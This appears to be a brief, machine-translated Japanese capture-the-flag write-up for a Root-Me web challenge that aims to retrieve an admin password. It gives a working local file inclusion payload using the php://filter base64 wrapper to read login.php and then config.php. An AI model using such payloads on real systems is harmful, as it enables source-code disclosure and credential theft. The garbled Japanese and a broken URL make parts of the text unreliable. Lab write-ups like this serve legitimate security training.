このアプリケーションの管理者パスワードを取得します。
ファイルを導入するには、------------ Googleにリンクする最初の必要性が含まれています
https://medium.com/@Aptive/local-file-inclusion-lfi-web-application-penetration-testing-cc9dc8dd3601
https://chybeta.github.io/2017/10/08/php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6% B4%9E /
本明細書で使用されるPHP://フィルタ擬似プロトコル:
ペイロード:
http://challenge01.root-me.org/web-serveur/ch12/?inc=php://filter/convert.base64-encode/resource=login.php
login.phpのbase64で暗号解読の内容を読んだ後:
別のPHPコードによると、config.phpのファイルの内容をお読みください。